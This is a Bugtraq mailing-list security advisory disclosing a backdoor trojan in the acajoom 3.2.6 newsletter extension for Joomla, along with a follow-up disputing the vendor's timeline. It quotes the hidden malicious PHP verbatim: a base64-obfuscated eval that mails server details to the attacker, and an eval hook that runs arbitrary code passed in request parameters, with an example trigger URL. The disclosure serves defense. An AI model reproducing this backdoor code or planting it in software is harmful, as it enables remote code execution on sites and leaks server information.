Bugtraq mailing list archives
Re: Back door trojan in acajoom-3.2.6 for joomla
From: Jan van Niekerk <jvnkrk () gmail com>
Date: Wed, 8 Jul 2009 08:20:05 +0200
The vendor has issued an update, but the explanation falsely minimises the problem. (They also did not credit qadr1 () ya ru, nor anyone else.) http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html states: "Acajoom GPL 3.2.7 is available for immediate download. We recommend all user who use the GPL verison to upgrade immediately due to security issue. " ... "A backdoor has been placed in the package by a hacker. This is concerning only user who downloaded the GPL version ( Acajoom GPL 3.2.7 ) between Thursday 25th of June and Sunday 28th of June." The start date for the back door and vulnerability is false. This issue existed in the wild before 19 June 2009. According to the timestamps in the archive, the hack was prepared on 11 June 2009. On 6/22/09, Jan van Niekerk wrote:
Vulnerability: Remote code execution back door Software: acajoom - mailing list extension for Joomla Acajoom is a newsletter component designed with ease of use and robustness in mind. Acajoom can handle an unlimited number of newsletters with an unlimited number of subscribers in just few clicks. Acajoom reuses some of Joomla 1.5 new concepts to make the users experience as smooth as possible. > And that's not all Severity: Not a big deal. Joomla components contain all sorts of obfuscated junk all the time. Who cares what it does? URLs: http://www.ijoobi.com/ http://www.ijoobi.com/media/acajoom-3.2.6.zip http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/ Vendor notified: Naah. No contact details. I suppose I might try battle the captcha one day. Vulnerability: http://www.ijoobi.com/media/acajoom-3.2.6.zip install.acajoom.php: function GetBots($us1,$us2,$us3) { list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ', 'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs'); eval(base64_decode($data2.$data1.$data3)); } define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.' .$array_lang[10-$count_num] ); $counter = COUNT_ROOT; $count_db = 'qadr'; $count_num = 8; GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']); Or, less cryptically: @mail('qadr1 () ya ru', $_SERVER['SERVER_NAME'], "http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']); self.acajoom.php says: class acajoomCommonStr { function GetStr($str) { eval(stripslashes($str)); } function InController($cnt,$location) { if ($location=='en-g') $this->GetStr($cnt); } } if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) { $getacajoomStr = new acajoomCommonStr(); $getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']); } ie. $URL/self.acajoom.php?s=phpinfo();&lang=en-g $URL is left as an exercise to the reader. Greetz: qadr1 () ya ru
Current thread:
- Re: Back door trojan in acajoom-3.2.6 for joomla Jan van Niekerk (Jul 08)
- <Possible follow-ups>
- Re: Re: Back door trojan in acajoom-3.2.6 for joomla chris . boergermann (Jul 23)
- Re: Re: Back door trojan in acajoom-3.2.6 for joomla Jeffrey Walton (Jul 23)